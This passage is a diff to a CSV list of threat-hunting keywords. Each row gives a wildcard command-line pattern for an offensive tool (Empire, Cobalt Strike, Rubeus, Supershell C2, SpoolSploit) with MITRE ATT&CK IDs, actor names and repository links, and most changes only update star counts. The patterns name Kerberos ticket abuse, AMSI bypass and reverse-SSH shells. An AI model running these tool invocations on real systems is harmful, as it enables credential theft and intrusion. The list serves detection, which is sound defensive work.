A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -a 1 -f *.dll -p http*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* -a bruteforce *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "* -a nightmare*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* -a spoolsample*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"* aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --access-token*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" 
@@ -90,46 +90,46 @@ "* ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" "* adhunt.py *","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "* adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" -"* admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -AgentDelay *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -AgentJitter 
*","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -AgentDelay *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -AgentJitter *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ajp-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-request.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"* All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* amsi_disable *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* amsi_disable *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "* --am-si-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"* --Args AntiVirus --XorKey*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"* --args whoami*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. 
system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"* arp.x64.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"* asktgs * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgs *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgs /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgt * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgt /user *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktht /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --Args AntiVirus --XorKey*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
